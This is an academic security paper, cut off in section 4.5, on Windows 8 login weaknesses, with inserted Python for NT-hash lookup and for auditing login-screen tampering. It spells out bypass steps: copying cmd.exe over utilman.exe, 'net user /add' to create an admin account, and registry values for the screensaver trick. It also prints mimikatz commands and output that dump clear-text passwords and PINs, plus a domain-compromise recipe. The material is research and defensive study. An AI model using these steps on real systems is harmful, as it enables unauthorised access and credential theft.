Vulnerabilities in login authentication methods and
password storage in Windows 8
John-Andre Bjorkhaug
Gjovik University College
March 2014
Today, with the rise of touchscreen devices such as tablets, smartphones and even laptops with touchscreens, users may find it too cumbersome to type in regular passwords. Typing, for example, an eight-character password containing letters, numbers and even symbols takes too much time on a touchscreen keyboard and is often not easy for the average user. The companies developing these devices have taken the problem under consideration and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. This paper focuses on the different methods used for logon authentication in the Microsoft Windows 8 and 8.1 operating systems, since these now appear on more and more touchscreen devices. The paper starts with an introduction explaining some of the new features of Windows 8. Then there is an introduction to work related to this paper. Following that is a section about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear text. Then it is time to dive into Windows 8, its new methods for login authentication and their vulnerabilities. The paper ends with a conclusion with some suggestions for techniques that can be used to mitigate some of the vulnerabilities discussed throughout this paper.
Categories and Subject Descriptors: D.4.6 [Security and Protection]: Invasive software—Operating system security
General Terms: security
Additional Key Words and Phrases: operating system security, passwords, authentication, PIN
1. INTRODUCTION
Today, devices with touchscreens, like smartphones, tablets and laptops, are getting more and more common, and operating systems like Android and iOS have been dominating for some years. Using text-based passwords containing, for example, both upper and lower case letters, numbers and even symbols takes too much time and is often not easy for the average user on a touchscreen soft keyboard. The companies developing these devices have taken the problem under consideration and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. PIN codes and the regular gesture passwords that have been used on different touch devices for years have a very small password space compared to a good old text-based password. In Windows 8, Microsoft presented some new native methods for logging in to a Windows system: a four-digit PIN code, the so-called picture password, and fingerprint. A four-digit PIN code speaks for itself; it is not very secure. A picture password, on the other hand, can be very secure if implemented correctly. Even though Microsoft Windows has been available in different forms on different touch devices for many years, a lot happened when they made Windows 8. This version of Windows runs just as well on touch devices as on desktop computers. You have the possibility to use the good old desktop on laptops and desktop computers, and the new tile interface called Modern UI (many still call the interface by its earlier name, Metro), which is better fitted for touch devices. Recently there has also been a rise in both laptops and desktop computers with touchscreens. Microsoft Windows 8 was released in August 2012 and was available to the general public at the end of October the same year. Windows 8.1 came out in October 2013, with small changes compared to 8 [ZDNet 2014]. Actually, 8.1 can in many ways be looked at more as a service pack than a full OS upgrade. Windows 8 can be said to have been one of the biggest changes, at least visually, since Windows 95 replaced Windows 3.11, but at least Windows 8 was very Windows 7-like when not using the new tile interface. Since Windows 8 is relatively new, there are still some teething problems, and both the operating system and the users still need to mature a bit. In addition to adding Modern UI for use on devices with a touchscreen, Microsoft also included several authentication methods to make the operating system even more user friendly on touch devices. In addition to the good old password, methods like PIN code and picture password have been included from Windows 8. The reason for this is so the user doesn't have to type in passwords like "Tr0ub4dor" [xkcd 2013] on the device's limited software keyboard, where for example the use of the "shift" key is rather cumbersome. These new login authentication methods have introduced quite a few new vulnerabilities into the login authentication in Windows, in addition to the ones that have been there for years.
This paper will discuss both old and new login authentication methods and their vulnerabilities. All tests performed for this paper have been done on a VMware virtual machine and a Dell Venue 11 Pro tablet, both running Windows 8.
This paper is organized as follows. Section 1 is the introduction you are now reading. Section 2 gives an introduction to work related to this paper. Section 3 is about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear text. Section 4 gives details about the new authentication methods used for logging in to Windows 8, and their vulnerabilities. The paper ends with section 5, the conclusion, with some suggestions for techniques that can be used to mitigate some of the vulnerabilities discussed throughout this paper.
2. RELATED WORK
Most books covering ethical hacking and penetration testing have a section about extracting and cracking LM and NTLM hashes, for example the "Hacking Exposed" series [McClure et al. 2009]. Not much has yet been written about the "new" authentication forms for Windows, picture passwords and PIN codes, in the context of Windows, but the paper "On the Security of Picture Gesture Authentication" by Ziming Zhao et al. [Zhao et al. 2013] describes rather comprehensive research on picture passwords, presenting an empirical analysis of picture gesture authentication based on more than 10,000 picture passwords. This paper focuses more on how the login mechanism works together with the rest of the operating system. When it comes to PIN codes, some statistical research has been done, among others by Joseph Bonneau et al. at Cambridge University [Bonneau et al. 2012] and the company "DataGenetics" [DataGenetics 2012]. Also, much of the content in this paper is relatively new, and only discussed in the blogs of the smart guys who find vulnerabilities and write exploits, like for example the blog of the Russian company Passcape [Passcape 2014] and that of the French security researcher Benjamin Delpy, aka "gentilkiwi" [Delpy 2014a].
3. CLASSICAL LOGIN AUTHENTICATION VULNERABILITIES IN WINDOWS
Before going into the vulnerabilities that are new to Windows 8 because of the new login authentication methods, the good old vulnerabilities in the login mechanism and password storage, which are still valid for Windows 8.x, will be discussed.
Fig. 1. Password login screen in Windows 8.1, with the choice of login method below the input field.
3.1 Password hashing
In Microsoft Windows, a cryptographic hash of the password is stored in a file called "SAM" (Security Accounts Manager), located at %systemroot%\system32\config\SAM. This file is part of the registry and is in an officially undocumented binary format [Hagen 2014]. In the Windows registry the SAM is placed under the key HKEY_LOCAL_MACHINE\SAM. Both of these locations are locked, even for the administrator, while the operating system is running, but it is possible to extract the hashes, for example from the registry on a running system, with the help of DLL injection into the LSASS (Local Security Authority Subsystem Service) process, using tools like pwdump, fgdump, Cain & Abel and mimikatz, which we will discuss more later. Other places to extract hashes from include a shadow copy of the SAM file. Readers interested in knowing more about what can be found in the LSASS process are recommended to read [Passcape 2011].
There are two different hash algorithms, called LM (LAN Manager) and NTLM (NT LAN Manager). From Windows Vista and Server 2008, the LM hash has been disabled by default, but it can be enabled for backwards compatibility. An LM hash can be used for passwords of up to 14 characters, and it has a serious vulnerability. The password is split in two halves, the first one seven characters and the second one the rest of the password. For example, a password of length 10 is split into one hash calculated from the first seven characters and one from the last three characters. All letters are capitalized first. This cuts a password of 14 characters from 2^84 to 2^37 different combinations [McClure et al. 2009]. This makes cracking of LM hashes very fast, using for example rainbow tables, which are pre-calculated tables of passwords and hashes. This paper will not go any further into the cracking of LM hashes, since this is out of scope for the paper. For more information see for example [McClure et al. 2009]. When it comes to NTLM hashes, there is a much bigger keyspace, but rainbow tables are still a very effective method for cracking these hashes, because there is no salting of the hash. The problem is that with NTLM's large keyspace, the tables get very space consuming. One of the largest publicly available rainbow tables for NTLM today is a table covering upper and lower case letters, the numbers 0-9 and space, for passwords with length 1 to 7 characters. This table is a little over 1TB. Compare this with a rainbow table for LM hashes covering all symbols on the keyboard and password lengths 1 to 7 characters, which in reality means 1-14 since the password is split in two: that table is 34GB [Freerainbowtables 2014]. Salting the hash means that a random value is added to the password before the hash algorithm is run, thereby creating different hashes when the same password is hashed twice. The password hashing mechanism in for example Linux salts its hashes. Salting the hash mitigates attacks like rainbow tables [McClure et al. 2009]. Lately it has also become very popular to use the GPU (Graphics Processing Unit) on graphics cards to increase the speed of cracking cryptographic hashes, since these are much more effective than regular CPUs on the simple mathematical operations used in hashing. According to Jeremy Gosney, one of the world's top experts in password cracking (in a Twitter conversation with the author), with a regular graphics card like the AMD Radeon HD 7970 it is possible to brute-force NTLM hashes at approximately 20 billion passwords per second. With a cluster of graphics cards, this can be multiplied by the number of graphics cards. One downside of building machines for password cracking with graphics cards is that it gets rather expensive. In February 2014 an AMD Radeon HD 7970 cost approximately NOK 3000 in Norway. But why build your own password cracking machine, when Amazon EC2 offers multiple graphics cards in their cloud computers, which can be rented for as low as $2 per hour [Amazon 2014]? It is very common to use large dictionaries to shorten the time needed to crack a password. Today, when there have been numerous leaks of large password databases, it is no problem for adversaries to create very effective dictionaries. The biggest password leak up till now is the leak of over 32,000,000 user accounts from the game producer RockYou in 2009 [Skullsecurity 2011].
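To make the unsalted-hash point concrete, here is an added example (not code from the paper): a pure-Python NT hash (MD4 over the UTF-16LE password; MD4 is implemented inline because OpenSSL builds often no longer expose it to hashlib), a precomputed hash-to-password table that matches an extracted hash with a single lookup, and a salted variant for contrast. The salted function uses SHA-256 purely as an illustration of why a per-user salt defeats a table built in advance; it is not how Windows stores anything.

```python
"""NT hash computation and a precomputed lookup table.

Added example, not code from the paper. The NT hash is MD4 over the
UTF-16LE encoding of the password, with no salt, which is why a table
computed once can be reused against every extracted hash.
"""
import hashlib
import os
import struct
from typing import Dict, Iterable, Optional, Tuple

MASK = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(v, f, X, order, shifts, k):
    # Each step rewrites one register (a, d, c, b in turn) from the other three.
    for i in range(16):
        r = (-i) % 4
        x, y, z = v[(r + 1) % 4], v[(r + 2) % 4], v[(r + 3) % 4]
        v[r] = _lrot((v[r] + f(x, y, z) + X[order[i]] + k) & MASK, shifts[i % 4])


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data (little-endian words, 64-byte blocks)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        v = state[:]
        _md4_round(v, F, X, list(range(16)), (3, 7, 11, 19), 0)
        _md4_round(v, G, X, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
                   (3, 5, 9, 13), 0x5A827999)
        _md4_round(v, H, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
                   (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4(UTF-16LE(password)), upper-case hex."""
    return md4(password.encode("utf-16le")).hex().upper()


def build_lookup_table(words: Iterable[str]) -> Dict[str, str]:
    """Precompute hash -> password once. A rainbow table is a space-optimised
    form of exactly this idea; it only works because there is no salt."""
    return {ntlm_hash(w): w for w in words}


def crack_with_table(nt_hash: str, table: Dict[str, str]) -> Optional[str]:
    """Unsalted: an extracted hash is matched with one dictionary lookup."""
    return table.get(nt_hash.upper())


def salted_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, str]:
    """Contrast: with a random per-user salt the same password hashes to a
    different value each time, so a table built in advance cannot be reused.
    SHA-256 is used here only as an illustration, not as a Windows format."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    table = build_lookup_table(["password", "letmein", "Tr0ub4dor"])
    print(crack_with_table("8846F7EAEE8FB117AD06BDD830B7586C", table))
    _, h1 = salted_hash("password")
    _, h2 = salted_hash("password")
    print("salted hashes differ:", h1 != h2)
```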
Cracking password hashes can be done for example with tools like the following:
—John The Ripper
—L0phtCrack
—Cain & Abel
—Ophcrack
—OclHashCat
—Tools from ElcomSoft
If a computer is compromised and the NTLM hashes are extracted, but the adversary isn't able to crack the password, the hash can still be useful. The hash can be used in a so-called pass-the-hash attack, where the hash is used for authentication to other systems connected to the same network as the adversary that use the same password as the compromised system, i.e. inter-system password re-use [Wolthusen 2014]. This can be done with tools like mimikatz and modifications of the psexec tool, which is included in the penetration testing framework Metasploit [Rapid7 2011]. This is a very effective attack in a Windows environment where the same administrator password is used on multiple computers, and it has been used on numerous penetration tests by the author of this paper with a very high success rate. Up until Windows 8.1 and Windows Server 2012 R2, it was only possible to reach limited resources with the pass-the-hash attack, but here Microsoft implemented a security feature in the Remote Desktop Protocol (RDP) called Restricted Admin, which actually makes it possible to connect to an RDP service using the pass-the-hash attack [Falde 2013] [Ronin 2014] [Lowe 2013]. As with most other attacks on passwords in Windows, this can be done with mimikatz, but also with a more known and recognized application called FreeRDP, which is an open implementation of the RDP protocol [Ronin 2014].
3.2 Clear text password extraction
In recent years it has also become publicly known that, because of a feature in Windows called WDigest, it is possible to extract passwords in clear text from memory using tools like mimikatz [Delpy 2014b] [Delpy 2011] or Windows Credential Editor [Amplia 2013]. WDigest is a DLL that was first added in Windows XP, and it is used to authenticate users against HTTP Digest authentication and Simple Authentication and Security Layer exchanges. These two authentication methods require a plain-text password to be able to function. To extract passwords from WDigest, the adversary needs access to a computer that is turned on and logged in, but how many average users lock their computer when they go to the toilet? Similar vulnerabilities also apply to other features that were implemented from Windows NT 6 (Windows Vista and Windows Server 2008), like for example when Single Sign On (SSO) to Remote Desktops is enabled (tspkg) [Delpy 2014d], when a Microsoft Live account (LiveSSP, where SSP stands for Security Support Provider) is used [Delpy 2012], and with the Kerberos SSP. Actually, in Windows 8.1 wdigest and tspkg are disabled by default, but when SSO for websites or RDP is enabled, wdigest and tspkg are too. The passwords stored in memory in all these scenarios are actually encrypted, but with such a bad method that it is very easy to decrypt them. The standard Windows function LsaProtectMemory is used for encryption and LsaUnprotectMemory for decryption [Pilkington 2012]. More methods for extracting passwords in clear text will follow when we later discuss some new vulnerabilities in Windows 8.
3.3 Bypassing login authentication
The techniques discussed earlier assume that the adversary already has access to the victim system, either by being a user of a multi-user system who wants to forge the identity of other users of the same system, or by being an adversary that has gotten access to a system that is powered on and already logged in. But what if the system is shut down or locked? Let's discuss some classical options to bypass the login authentication in Windows. Some of these attacks have been known all the way back to Windows XP, but are still not fixed in Windows 8.1.
Password reset
Probably the most known and most used Windows login bypass is the use of bootable media to edit the SAM file. This trick is very simple, but it can leave easily found traces that an adversary has accessed the system. It works by booting the system with another operating system, most often a small Linux distribution, and editing the SAM file, which was discussed earlier. This works like a charm since Windows isn't running. With tools like the Offline NT Password and Registry Editor developed by Peter Nordahl-Hagen [Hagen 2014], it is possible to do things like:
—Change or clear a users password
—Enable disabled accounts
—Create new users
—Remove users
—Change a users group
To access a system without leaving any easy-to-find traces, the adversary could create a new user, add it to the "admin" group, log in to the system and at the end delete the newly added user.
msv1_0.dll patching at boot-time
If creating a new user is not desired, patching the DLL file "msv1_0.dll" can be a nice option. This DLL is called by the Local Security Authority (LSA), which was mentioned earlier, and processes login data collected by the Credential Providers (Credential Providers replaced the more known GINA from Windows Vista [Griffin 2007]) for the Winlogon process [Microsoft 20xx]. At boot time, this can be done using tools like Kon-Boot [thelead82 2013]. This application silently bypasses the login authentication on any modern Windows operating system by patching msv1_0.dll when it is loaded into memory. The patching causes the password check to always return true, so that no account requires a password, overriding any old passwords. The way this tool is used is to boot the computer from some kind of external medium (CD, DVD, USB stick etc.); a Kon-Boot boot screen will then be displayed while the tool is working. Then, when the Windows login screen is visible, select the user you want to log in as, and log in without any password. When the computer is then rebooted, the victim logs in like he has always done, with his good old password.
As a side note, Kon-Boot is also available for Apple OS X, but it works in a different way there.
msv1_0.dll patching with FireWire
IEEE 1394, commonly known as FireWire, is another interesting case when it comes to bypassing Windows login authentication. The vulnerability with FireWire is that it has direct access to physical memory addresses, making it possible to patch msv1_0.dll just as mentioned earlier, but this time at run time. This attack was first demonstrated using a modified iPod running Linux and a script called winlockpwn in 2008 [Spylogic 2008]. Neither iPod-Linux nor the winlockpwn tool is updated anymore, but thanks to Carsten Maartmann-Moe, a new tool called Inception was released in 2011 [Maartmann-Moe 2011], based on winlockpwn. Most new computers today don't have a FireWire port, but for an adversary this is in many cases not a problem. FireWire ports can be bought as PCMCIA cards, and when these are inserted into the computer's PCMCIA port, the drivers will install themselves, even if the computer is locked. An interesting thing here is that the FireWire attack can also be used when the hard disk in the computer is encrypted with for example BitLocker, if the computer is not shut down but only locked.
As another side note, Inception is also able to bypass passwords on Apple OS X and Ubuntu.
Utilman bypass
This again is a very old and quite well-known trick, and Microsoft has actually recommended using this technique to bypass a forgotten password. This technique was already possible in Windows 2000, so why it is still possible in Windows 8.1 is a mystery. It takes advantage of a utility called Utilman, which is used for the accessibility features Magnifier, Narrator and On-Screen Keyboard. This utility is available at the login screen in all newer Windows versions, and can be opened by pressing the Windows key together with the letter U. The problem is that if the system is booted with for example a Linux live CD, and the adversary can access the files on the hard disk, he can remove or rename the file "utilman.exe", which is located in %systemroot%\system32, and then copy "cmd.exe" to "utilman.exe". When the system is then rebooted and the login screen once again appears, the adversary can press Win+U, and a command prompt window running with system privileges will pop up. See Figure 3. The file "sethc.exe", which is also located in %systemroot%\system32, can be exploited in a very similar way. This file is used for the "Sticky Keys" feature of Windows, and it will run if the user presses the "shift" key five times in a row. If cmd.exe is copied to sethc.exe and the "shift" key is pressed five times at the login screen, the command prompt will again pop up [Dieterle 2014]. If a command prompt isn't good enough for the adversary, he can add users, change passwords, delete users and so on using Windows' net commands, since the prompt is running as the "system" user. For example, create a user with "net user /add evilhacker *" (the * makes the command prompt for the password to set) and add it to the "administrators" group with "net localgroup administrators /add evilhacker".
Login screensaver
Another not so well-known trick, which works for Windows 7 and Windows 8.x and is in a way related to the utilman.exe bypass, is to enable a screensaver at the login screen, but instead of a screensaver, for example cmd.exe is opened. This can be done by adding the following REG_SZ values to the registry key HKEY_USERS\.Default\Control Panel\Desktop [Superuser 2012]:
SCRNSAVE.EXE = C:\WINDOWS\SYSTEM32\LOGON.SCR
ScreenSaveActive = 1
ScreenSaveIsSecure = 0
ScreenSaveTimeOut = 10 (time before the screensaver starts, in seconds)
Then, at the login screen, after for example 10 seconds, the cmd.exe window will pop up with system privileges.
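As an added audit example (not code from the paper) for the utilman/sethc and login-screensaver tricks above: the first check compares utilman.exe, sethc.exe and logon.scr against cmd.exe by content hash, since both tricks work by copying cmd.exe over a file that the login screen will execute; the second parses a "reg export" dump of the .Default Desktop key and flags the value combination listed above. The directory and the .reg text are supplied by the caller, and all sample data is constructed, so the check runs on any OS.

```python
r"""Audit checks for login-screen binary replacement and logon screensaver abuse.

Added example, not from the paper. Detection only: it reports files under
system32 whose content equals cmd.exe, and a logon-screen screensaver
configuration under HKEY_USERS\.DEFAULT\Control Panel\Desktop that matches
the values the paper lists.
"""
import hashlib
import os
import re
import tempfile
from typing import Dict, List

# Files the login screen will execute before anyone has authenticated.
LOGIN_SCREEN_BINARIES = ("utilman.exe", "sethc.exe", "logon.scr")


def _sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_login_screen_binaries(system32_dir: str) -> List[str]:
    """Findings for login-screen binaries that are byte-identical to cmd.exe."""
    findings = []
    cmd_path = os.path.join(system32_dir, "cmd.exe")
    if not os.path.isfile(cmd_path):
        return ["cmd.exe not found; cannot compare"]
    cmd_hash = _sha256_of(cmd_path)
    for name in LOGIN_SCREEN_BINARIES:
        path = os.path.join(system32_dir, name)
        if os.path.isfile(path) and _sha256_of(path) == cmd_hash:
            findings.append(f"{name} is a copy of cmd.exe")
    return findings


_DESKTOP_KEY = r"[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"
_VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')


def parse_desktop_key(reg_text: str) -> Dict[str, str]:
    """Collect the REG_SZ values of the .DEFAULT Desktop key from a reg export.
    Backslashes are doubled in .reg files, so they are folded back here."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line.lower() == _DESKTOP_KEY.lower()
            continue
        m = _VALUE_RE.match(line) if in_key else None
        if m:
            values[m.group(1)] = m.group(2).replace("\\\\", "\\")
    return values


def check_logon_screensaver(values: Dict[str, str]) -> List[str]:
    """Flag an active, unsecured logon screensaver with a short timeout, or one
    that points at something other than a .scr file. A replaced logon.scr is
    caught by check_login_screen_binaries, not here."""
    findings = []
    exe = values.get("SCRNSAVE.EXE", "")
    if values.get("ScreenSaveActive") == "1" and exe:
        if not exe.lower().endswith(".scr"):
            findings.append(f"logon screensaver points at non-.scr file: {exe}")
        if values.get("ScreenSaveIsSecure") == "0":
            findings.append("logon screensaver is unsecured (ScreenSaveIsSecure=0)")
        timeout = values.get("ScreenSaveTimeOut", "")
        if timeout.isdigit() and int(timeout) < 60:
            findings.append(f"logon screensaver timeout is only {timeout}s")
    return findings


# Constructed sample in the shape 'reg export' writes; not a real dump.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"SCRNSAVE.EXE"="C:\\WINDOWS\\SYSTEM32\\cmd.exe"
"ScreenSaveActive"="1"
"ScreenSaveIsSecure"="0"
"ScreenSaveTimeOut"="10"
"""


def build_demo_dir() -> str:
    """Constructed stand-in for system32: utilman.exe is a copy of cmd.exe,
    the other two files are untouched."""
    d = tempfile.mkdtemp()
    for name, content in (("cmd.exe", b"MZ-cmd"), ("utilman.exe", b"MZ-cmd"),
                          ("sethc.exe", b"MZ-sethc"), ("logon.scr", b"MZ-scr")):
        with open(os.path.join(d, name), "wb") as f:
            f.write(content)
    return d


if __name__ == "__main__":
    for finding in check_login_screen_binaries(build_demo_dir()):
        print("FINDING:", finding)
    for finding in check_logon_screensaver(parse_desktop_key(SAMPLE_REG)):
        print("FINDING:", finding)
```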
Now, let us finish with the old stuff and cough up something new(ish).
4. PRESENTING: WINDOWS 8
Finally, the essentials of this paper: login authentication methods that are new in Windows 8. We start with some background material about the "root of all evil", the Data Protection Application Programming Interface and the Windows Vault.
4.1 Data Protection Application Programming Interface and Windows Vault
First, a little about DPAPI, about which it is very difficult to find official information. Books like "Windows Internals", which in most cases answer almost anything about the internals of Windows, don't contain any information about the Windows Vault and the Data Protection Application Programming Interface (DPAPI). The only information available from Microsoft is the public interface to DPAPI; no internal details are published. Can it be because of the serious vulnerabilities in these features of Windows? Although there have been multiple attempts at reverse engineering DPAPI, the best sources are the Russian company "Passcape" [Passcape 2012a] and the paper "Recovering Windows Secrets and EFS Certificates Offline" [Burzstein and Picod 2010] by Elie Bursztein et al., which presents a complete reverse engineering project of DPAPI. Together with this paper, Bursztein et al. also released an application called DPAPIck, which can be used to decrypt DPAPI secrets offline. This paper is highly recommended if the reader wants to learn the detailed internals of DPAPI.
From Windows 2000, Microsoft included a special data protection interface called the Data Protection Application Programming Interface, DPAPI for short. This interface is used to easily store sensitive data on disk under Windows. Currently DPAPI is used in many Windows applications and subsystems, handling tasks like the file encryption system (EFS), wireless network key storage, Internet Explorer, Outlook, Skype, Credential Manager, Microsoft Vault and so on. Each encrypted unit is called a "blob". DPAPI is considered very easy to use for encryption (CryptProtectData) and decryption (CryptUnprotectData) of data, and is therefore very popular among programmers. The Russian company Passcape was the first to release software capable of decrypting and extracting data which had been encrypted with DPAPI on a live system.
In theory, DPAPI sounds very secure. It uses well-known and proven cryptographic algorithms. Windows 7 for example uses AES-256 encryption in CBC mode, SHA-512 for hashing, and PBKDF2 as the password-based key derivation routine. There is no available information about the cryptographic algorithms used in Windows 8.x, but we can assume they are the same as in Windows 7. This sounds secure, but there are vulnerabilities. The operating system needs to be able to read data from DPAPI without any dialogue with the user. Therefore the keys to decrypt DPAPI data must be in memory, after they are decrypted from a master key file. This is what tools like the ones from Passcape, and mimikatz, use to extract login passwords from a running Windows system, which will be discussed in the following sections. Up until Windows 8, it was only possible to extract data about the currently logged-in user on the actual system using DPAPI. With DPAPI-NG in Windows 8, it is possible to decrypt and extract data for all users, even if the files used by DPAPI are extracted and imported into another system. As mentioned, Windows Vault uses DPAPI to encrypt and store passwords used by applications in Windows and by Windows itself. Windows Vault was introduced in Windows 7 as a replacement for the Credential Manager, which was in use in earlier versions of Windows. The Windows Vault is what is used by the PIN, picture password and fingerprint login authentication.
4.2 PIN codes and their vulnerabilities
The main thing to be worried about when it comes to PIN codes as login authentication in Windows 8 is that Microsoft only gives you the option to use four digits. This reduces the keyspace drastically, and if humans choose the passwords, there is a pretty big chance it will be relatively easy to guess, especially if the adversary has some knowledge about the victim. One can wonder why on earth Microsoft limited PIN codes to four digits. There has been significant research done on the security of PIN codes. Researching the statistics of PIN codes extracted from password leaks like the one from RockYou, mentioned earlier, has produced some interesting facts about PIN codes. Research has been done among others by Joseph Bonneau et al. at Cambridge University [Bonneau et al. 2012] and the company DataGenetics [DataGenetics 2012]. Below is a table showing the 20 most used PIN codes, from a statistical analysis done on 3,400,000 PIN codes by DataGenetics in 2012 [DataGenetics 2012]:
Nr  PIN   Frequency
 1  1234  10.713%
 2  1111   6.016%
 3  0000   1.881%
 4  1212   1.197%
 5  7777   0.745%
 6  1004   0.616%
 7  2000   0.613%
 8  4444   0.526%
 9  2222   0.516%
10  6969   0.512%
11  9999   0.451%
12  3333   0.419%
13  5555   0.395%
14  6666   0.391%
15  1122   0.366%
16  1313   0.304%
17  8888   0.303%
18  4321   0.293%
19  2001   0.290%
20  1010   0.285%
Enough about general PIN code vulnerabilities. The rest of this section actually applies not only to the use of PIN codes in Windows 8; it also applies to picture passwords and to some degree to the fingerprint login. It is discussed in this section because this paper handles PIN codes first. Information and vulnerabilities that only apply to picture passwords and fingerprints are discussed in later sections. In 2012 it became publicly known that Windows 8 stores login passwords in an easily recoverable way when a PIN or picture password is in use. This is because they are stored in the Windows Vault, which uses DPAPI, which was discussed earlier in this paper. Using a tool from Passcape it was possible to easily extract the users' passwords in clear text [Passcape 2012c]. On the 8th of January 2014, I came in contact with Benjamin Delpy aka "gentilkiwi" on Twitter, the man behind the open-source tool mimikatz, and asked him how this was done. A few hours later he had included this feature in mimikatz. Some days later Mr Delpy published a post on his blog describing how this was done [Delpy 2014e].
The extraction of the regular password, the PIN code and the picture password coordinates using mimikatz is shown below, by running mimikatz with the command line privilege::debug token::elevate vault::list exit. Note that some non-interesting lines are removed from the output to save space in this paper.
  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C"
 .## ^ ##.  (Mar  2 2014 22:44:55)
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                   (oe.eo)
  '#####'                                    with 14 modules * * */

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM
<snip>

mimikatz(commandline) # vault::list
Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
<snip>
  0. Picture Password Credential
<snip>
  *** Picture Password ***
  User     : venue\John Doe
  Password : Password00
  Picture password (grid is 150*100)
   [0] line  (x = 17 ; y = 5) -> (x = 33 ; y = 65)
   [1] point (x = 70 ; y = 21)
   [2] point (x = 80 ; y = 20)
  1. PIN Logon Credential
<snip>
  *** Pin Logon ***
  User     : venue\John Doe
  Password : Password00
  PIN Code : 2580
  2. PIN Logon Credential
<snip>
  *** Pin Logon ***
  User     : venue\Jane Doe
  Password : TopSecret123!
  PIN Code : 1234
<snip>
When combining mimikatz with Kon-Boot, which was mentioned earlier, it is possible to bypass login authentication and extract login credentials for all users of the system. This is also valid when the computer and user are members of an Active Directory domain. So even though the adversary doesn't get access to domain resources when using authentication bypass tools like Kon-Boot or the Inception FireWire attack, he can compromise a domain account with the following steps:
(1) Bypass authentication with for example Kon-Boot or Inception
(2) Extract passwords from the Vault using mimikatz
(3) Reboot the computer
(4) Log in with the valid credentials obtained in the previous steps
(5) Jackpot! The adversary has access to the victim's domain resources
It is also very interesting to know that the password vault is global, so once logged in to a system as an administrator, the user can extract login credentials for all users of the system.
Instead of bypassing the login with tools like Kon-Boot, mimikatz can also be run in the system-privileged cmd.exe from the "Utilman authentication bypass" attack, as shown in figure 3.
Fig. 2. cmd.exe running as utilman.exe on the Windows 8.1 login screen
4.3 Picture password and its vulnerabilities
Picture passwords are a new login authentication method in Windows 8, based on the gesture authentication previously in use on both Android and iOS devices with touchscreens. The way this method works is that the user defines three gestures, which are used for authentication. Each of the three gestures can be a single point, a circle or a line, on a 100 by 150 grid. In the mimikatz output in the section above about PIN codes, the coordinates for the different gestures on the picture in Figure 3 are shown. The line (1) goes from the top to the bottom of The Terminator's shotgun, the first dot (2) is the left glass of his sunglasses, and the second dot (3) is the right glass.
If Microsoft fixes these issues, the picture password method looks very promising, with a high number of possible combinations, and it is easy to use on touchscreen devices.
As mentioned in the section about PINs, the vault attack is the same when using a picture password.
Also, there exist a couple of not so technical attacks on touchscreen devices,
for both PIN and picture password. The smudge attack is a method to find the
gesture pattern used to unlock touchscreen devices using this form of authentication.
This attack relies on detecting the smudge left on the screen by grease from the
user’s fingers. Using proper lighting, camera settings and image processing software,
both a gesture and a PIN code can, in many cases, be recovered. This attack was
first made publicly known by a research team from the University of Pennsylvania,
at the 4th USENIX conference on Offensive Technologies [Aviv et al. 2010]. The
smudge attack is in many ways similar to number keypads that have some numbers
more worn than others, which in many cases makes it possible for an adversary
to see commonly used digits. Another vulnerability both PIN codes and picture
passwords might be more exposed to is shoulder surfing [Long and Mitnick 2011],
since it is much easier to see the gesture on a picture than the characters typed on
a keyboard.
Fig. 3. The picture password login screen, with coordinates.
4.4 Fingerprints and their vulnerabilities
From Windows 8.1, Windows got native support for fingerprint login authentication
[Microsoft 2013]. Knowing this, and how the PIN and picture password functions store
their credentials, I was curious about how this was done with fingerprints. Not able to find
any information about this, I once again asked Benjamin Delpy, on the 20th of January.
On the 23rd, he had implemented this in mimikatz as well [Delpy 2014f]. It turns out
that, as suspected, the fingerprint login stores its information in the same way as
PIN and picture password, in the Vault. Therefore, it is also possible to extract
the login passwords when fingerprint is in use. With more knowledge on
the subject, I was able to find that Passcape had already implemented this in their
commercial ”Windows Vault Explorer” in 2012 [Passcape 2012b]. In addition, of
course, the fingerprint authentication in Windows is vulnerable to all the classical
attacks on fingerprint readers, like for example a fingerprint printed on paper,
latex fingers etc. This can be seen in for example the Discovery Channel show
Mythbusters episode 59, ”Crimes and Myth-Demeanors 2” [Mythbusters 2006].
4.5 Multi-factor login authentication and its vulnerabilities
On the 23rd of February, Benjamin Delpy once again proved his skills, and released a
new feature in his mimikatz. It was now possible to extract the PIN code used
when a smart card is used instead of a password for Windows login
